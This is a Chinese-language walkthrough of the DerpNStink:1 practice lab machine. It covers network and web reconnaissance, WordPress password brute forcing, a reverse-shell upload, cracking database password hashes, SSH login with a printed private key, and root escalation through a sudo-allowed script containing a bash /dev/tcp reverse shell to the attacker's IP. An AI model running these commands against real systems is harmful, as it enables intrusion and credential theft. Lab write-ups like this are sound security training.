红队打靶练习:DERPNSTINK: 1

目录

信息收集

1、arp

2、netdiscover

3、nmap

4、nikto

5、whatweb

目录探测

1、gobuster

2、dirsearch

WEB

get flag1

robots.txt

/php/phpmyadmin

/temporary

/weblog

wordpress

wpscan扫描

漏洞发现

提权

系统信息收集

mysql登录

john

get flag2

ssh登录

ftp登录

ssh登录成功

get flag3

横向提权

提权

get flag4 and root

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1   00:50:56:c0:00:08       VMware, Inc.
192.168.135.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.135.132 00:50:56:3d:16:2b       VMware, Inc.
192.168.135.254 00:50:56:ed:78:78       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.355 seconds (108.70 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.135.0/24


 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.135.1   00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.135.2   00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.135.132 00:50:56:3d:16:2b      1      60  VMware, Inc.
 192.168.135.254 00:50:56:ed:78:78      1      60  VMware, Inc.


3、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.135.132 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 09:21 CST
Nmap scan report for 192.168.135.132
Host is up (0.0033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:50:56:3D:16:2B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 21,22,80 192.168.135.132 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 09:22 CST
Nmap scan report for 192.168.135.132
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:50:56:3D:16:2B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.135.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.26 seconds


4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.135.132
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.135.132
+ Target Hostname:    192.168.135.132
+ Target Port:        80
+ Start Time:         2024-01-08 09:22:39 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/temporary/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 512, size: 55dcb6aaa2f50, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /weblog/: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8104 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-01-08 09:22:57 (GMT8) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.135.132
WhatWeb report for http://192.168.135.132
Status    : 200 OK
Title     : DeRPnStiNK
IP        : 192.168.135.132
Country   : RESERVED, ZZ

Summary   : Apache[2.4.7], Google-API[ajax/libs/jquery/1.7.1/jquery.min.js], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], JQuery[1.7.1], Script[text/info,text/javascript]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.7 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Google-API ]
        This plugin identifies references to Google API in
        <script>.

        String       : ajax/libs/jquery/1.7.1/jquery.min.js

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.7 (Ubuntu) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Version      : 1.7.1
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : text/info,text/javascript

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 08 Jan 2024 01:26:53 GMT
        Server: Apache/2.4.7 (Ubuntu)
        Last-Modified: Sun, 12 Nov 2017 16:12:12 GMT
        ETag: "512-55dcb6aaa2f50-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 567
        Connection: close
        Content-Type: text/html

目录探测

1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.135.132 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.135.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1298]
/.html                (Status: 403) [Size: 287]
/.php                 (Status: 403) [Size: 286]
/weblog               (Status: 301) [Size: 318] [--> http://192.168.135.132/weblog/]
/php                  (Status: 301) [Size: 315] [--> http://192.168.135.132/php/]
/css                  (Status: 301) [Size: 315] [--> http://192.168.135.132/css/]
/js                   (Status: 301) [Size: 314] [--> http://192.168.135.132/js/]
/javascript           (Status: 301) [Size: 322] [--> http://192.168.135.132/javascript/]
/robots.txt           (Status: 200) [Size: 53]
/.php                 (Status: 403) [Size: 286]
/.html                (Status: 403) [Size: 287]
/temporary            (Status: 301) [Size: 321] [--> http://192.168.135.132/temporary/]
/server-status        (Status: 403) [Size: 295]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.135.132 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /usr/share/dirbuster/wordlists/reports/http_192.168.135.132/_24-01-08_09-30-31.txt

Target: http://192.168.135.132/

[09:30:31] Starting:
[09:30:31] 301 -  314B  - /js  ->  http://192.168.135.132/js/
[09:30:31] 301 -  315B  - /php  ->  http://192.168.135.132/php/
[09:30:49] 301 -  315B  - /css  ->  http://192.168.135.132/css/
[09:30:56] 301 -  322B  - /javascript  ->  http://192.168.135.132/javascript/
[09:31:02] 200 -    3KB - /php/phpmyadmin/
[09:31:06] 200 -   53B  - /robots.txt

WEB


get flag1
在源码中可以找到第一个flag。


robots.txt
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.135.132/robots.txt
User-agent: *
Disallow: /php/
Disallow: /temporary/


/php/phpmyadmin


/temporary


/weblog


我们发现并不能加载出来,我们加入 /etc/hosts中  ,让电脑先解析 hosts文件!

┌──(root㉿ru)-[~/kali]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       ru

192.168.135.132 derpnstink.local



# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters



得出有两个用户  Derp 、Stinky 

并且使用了wordpress

wordpress

wpscan扫描
payload

wpscan --url http://derpnstink.local/weblog/ -e u



发现有个用户   admin

尝试暴力枚举密码!

payload

┌──(root㉿ru)-[~/kali]
└─# wpscan --url http://derpnstink.local/weblog/ -U admin -P /usr/share/wordlists/rockyou.txt


密码是admin,我们去登陆wordpress。



wordpress的默认登录目录是wp-admin!

可以看到wordpress的版本是 4.6.27

漏洞发现



在这里发现一个文件上传!我们尝试上传反弹shell木马!



点击标题即可!

┌──(root㉿ru)-[~/kali]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.135.128] from (UNKNOWN) [192.168.135.132] 34604
bash: cannot set terminal process group (1284): Inappropriate ioctl for device
bash: no job control in this shell
</html/weblog/wp-content/uploads/slideshow-gallery$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</html/weblog/wp-content/uploads/slideshow-gallery$

提权

系统信息收集
www-data@DeRPnStiNK:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/bin/ping
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
www-data@DeRPnStiNK:/home$

www-data@DeRPnStiNK:/var/www/html$ ls -al
ls -al
total 372
drwxr-xr-x 8 nobody   nogroup   4096 Nov 12  2017 .
drwxr-xr-x 3 root     root      4096 Nov 11  2017 ..
-rw-r--r-- 1 root     root        18 Nov 12  2017 .htaccess
drwxr-xr-x 2 root     root      4096 Nov 11  2017 css
-rw-r--r-- 1 root     root    108987 Nov 11  2017 derp.png
-rw-r--r-- 1 root     root      1298 Nov 12  2017 index.html
drwxr-xr-x 2 root     root      4096 Nov 11  2017 js
drwxr-xr-x 2 root     root      4096 Nov 11  2017 php
-rw-r--r-- 1 root     root        53 Nov 11  2017 robots.txt
-rw-r--r-- 1 root     root    222045 Nov 11  2017 stinky.png
drwxrwxrwx 2 root     root      4096 Nov 12  2017 temporary
drwxr-xr-x 5 www-data root      4096 Jan  7 20:23 weblog
drwxr-xr-x 2 root     root      4096 Jan  9  2018 webnotes
www-data@DeRPnStiNK:/var/www/html$ cd weblog
cd weblog
www-data@DeRPnStiNK:/var/www/html/weblog$ ls
ls
index.php        wp-blog-header.php    wp-cron.php        wp-mail.php
license.txt      wp-comments-post.php  wp-includes        wp-settings.php
readme.html      wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php  wp-config.php         wp-load.php        wp-trackback.php
wp-admin         wp-content            wp-login.php       xmlrpc.php


在网站根目录找到weblog 发现config文件!说明存在用户名和密码!

mysql登录






unclestinky   $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

admin   $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

john
┌──(root㉿ru)-[~/kali]
└─# cat hash.txt
unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

┌──(root㉿ru)-[~/kali]
└─# john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 48 needed for performance.
wedgie57         (?)
1g 0:00:00:00 DONE (2024-01-08 12:19) 100.0g/s 100.0p/s 100.0c/s 100.0C/s wedgie57
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

密码就是   wedgie57         

get flag2
我们登录wordpress,使用unclestinky才能成功!使用stinky会失败!


ssh登录

使用stinky进行登录!使用unclestinky会失败!

┌──(root㉿ru)-[~/kali]
└─# ssh stinky@192.168.135.132
The authenticity of host '192.168.135.132 (192.168.135.132)' can't be established.
ED25519 key fingerprint is SHA256:4Qn5hPeQwj5Ukq/WfZZgN06jXA62NhogxRNpgEs2c4c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.135.132' (ED25519) to the list of known hosts.
Ubuntu 14.04.5 LTS


                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'

stinky@192.168.135.132: Permission denied (publickey).

被拒绝了!我们尝试登录ftp

ftp登录

┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.135.132
Connected to 192.168.135.132.
220 (vsFTPd 3.0.2)
Name (192.168.135.132:root): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -al
229 Entering Extended Passive Mode (|||43337|).
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||47896|).
150 Here comes the directory listing.
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 network-logs
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
-rwxr-xr-x    1 0        0              17 Nov 12  2017 test.txt
drwxr-xr-x    2 0        0            4096 Nov 12  2017 tmp

把txt文件都下载到本地!

ssh是个目录,cd进去发现还是ssh,那么就继续cd,一直到出现key.txt

大概需要cd七次!

┌──(root㉿ru)-[~/kali]
└─# cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

┌──(root㉿ru)-[~/kali]
└─# cat test.txt
vsftpd test file

┌──(root㉿ru)-[~/kali]
└─# cat  key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----

发现key.txt是密钥!我们可以进行ssh登录啦!

ssh登录成功

┌──(root㉿ru)-[~/kali]
└─# chmod 444 key.txt

┌──(root㉿ru)-[~/kali]
└─# ssh -i key.txt stinky@192.168.135.132
Ubuntu 14.04.5 LTS


                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0444 for 'key.txt' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "key.txt": bad permissions
stinky@192.168.135.132: Permission denied (publickey).


发现给密钥赋权为444会报错!那就赋权200!!

┌──(root㉿ru)-[~/kali]
└─# chmod 200 key.txt

┌──(root㉿ru)-[~/kali]
└─# ssh -i key.txt stinky@192.168.135.132
Ubuntu 14.04.5 LTS


                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

331 packages can be updated.
231 updates are security updates.

Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$

登录成功!


从这就可以验证ssh目录确实多!

get flag3
stinky@DeRPnStiNK:/home$ cd stinky/
stinky@DeRPnStiNK:~$ ls
Desktop  Documents  Downloads  ftp
stinky@DeRPnStiNK:~$ cd Desktop/
stinky@DeRPnStiNK:~/Desktop$ ls
flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)


stinky@DeRPnStiNK:~/Documents$ ls -al
total 4300
drwxr-xr-x  2 stinky stinky    4096 Nov 13  2017 .
drwx------ 12 stinky stinky    4096 Jan  9  2018 ..
-rw-r--r--  1 root   root   4391468 Nov 13  2017 derpissues.pcap
stinky@DeRPnStiNK:~/Documents$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.135.128 - - [07/Jan/2024 23:33:09] "GET /derpissues.pcap HTTP/1.1" 200 -

┌──(root㉿ru)-[~/kali]
└─# wget http://192.168.135.132:8000/derpissues.pcap
--2024-01-08 12:33:09--  http://192.168.135.132:8000/derpissues.pcap
正在连接 192.168.135.132:8000... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4391468 (4.2M) [application/vnd.tcpdump.pcap]
正在保存至: “derpissues.pcap”

derpissues.pcap                                  100%[=========================================================================================================>]   4.19M  25.3MB/s  用时 0.2s

2024-01-08 12:33:09 (25.3 MB/s) - 已保存 “derpissues.pcap” [4391468/4391468])



账号:derp
密码:derpderpderpderpderpderpderp

横向提权

stinky@DeRPnStiNK:~/Documents$ cat /etc/passwd | grep "/home" | grep -v nologin
syslog:x:101:104::/home/syslog:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
saned:x:108:115::/home/saned:/bin/false
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash
stinky@DeRPnStiNK:~/Documents$

stinky@DeRPnStiNK:~/Documents$ su mrderp
Password:
mrderp@DeRPnStiNK:/home/stinky/Documents$ whoami
mrderp
mrderp@DeRPnStiNK:/home/stinky/Documents$

提权

mrderp@DeRPnStiNK:~/Downloads$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$


mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~$ cd /home/mrderp/binaries
bash: cd: /home/mrderp/binaries: No such file or directory
mrderp@DeRPnStiNK:~$

说明我们可以运行/home/mrderp/binaries目录下的derpy文件,但是目录中没有binaries文件夹更没有derpy文件!我们自己创建一个!

mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries
mrderp@DeRPnStiNK:~/binaries$ touch derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo "/bin/bash -c 'bash -i >&/dev/tcp/192.168.135.128/9090 0>&1'" >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
/bin/bash -c 'bash -i >&/dev/tcp/192.168.135.128/9090 0>&1'
mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh


写完paylaod后,记得使用sudo运行,并且使用kali监听

get flag4 and root
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 9090
listening on [any] 9090 ...
connect to [192.168.135.128] from derpnstink.local [192.168.135.132] 53492
root@DeRPnStiNK:~/binaries# id
id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~/binaries# cd /rot
cd /rot
bash: cd: /rot: No such file or directory
root@DeRPnStiNK:~/binaries# cd /root
cd /root
root@DeRPnStiNK:/root# ls
ls
Desktop
Documents
Downloads
root@DeRPnStiNK:/root# cd De
cd Desktop/
root@DeRPnStiNK:/root/Desktop# ls
ls
flag.txt
root@DeRPnStiNK:/root/Desktop# cat f
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo


root@DeRPnStiNK:/root/Desktop#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/305867.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Orchestrator源码解读2-故障失败发现

目录 目录 前言 核心流程函数调用路径 GetReplicationAnalysis 故障类型和对应的处理函数 拓扑结构警告类型 与MHA相比 前言 Orchestrator另外一个重要的功能是监控集群&#xff0c;发现故障。根据从复制拓扑本身获得的信息&#xff0c;它可以识别各种故障场景。Orchest…

Vue2.v-指令

v-if 在双引号中写判断条件。 <div v-if"score>90">A</div> <div v-else-if"score>80">B</div> <div v-else>C</div>v-on: :冒号后面跟着事件。 为了简化&#xff0c;可以直接用代替v-on:。 事件名“内联语…

【前端素材】同城服务分类手机APP页面的设计实现

一、需求分析 一个同城服务分类手机页面是一个用于提供同城服务分类信息的移动设备页面。它通常具有以下功能&#xff1a; 地理定位&#xff1a;同城服务分类手机页面可以利用用户的地理定位功能&#xff0c;获取用户当前所在的城市或地区信息&#xff0c;以便提供与用户所在地…

一、Mybatis 简介

本章概要 简介持久层框架对比快速入门&#xff08;基于Mybatis3方式&#xff09; 1.1 简介 https://mybatis.org/mybatis-3/zh/index.html MyBatis最初是Apache的一个开源项目iBatis, 2010年6月这个项目由Apache Software Foundation迁移到了Google Code。随着开发团队转投G…

12、DolphinScheduler

1、DolphinScheduler简介 1.1、 DolphinScheduler概述 Apache DolphinScheduler是一个分布式、易扩展的可视化DAG工作流任务调度平台。致力于解决数据处理流程中错综复杂的依赖关系&#xff0c;使调度系统在数据处理流程中开箱即用。 1.2、 DolphinScheduler核心架构 Dolph…

UV贴图和展开初学者指南

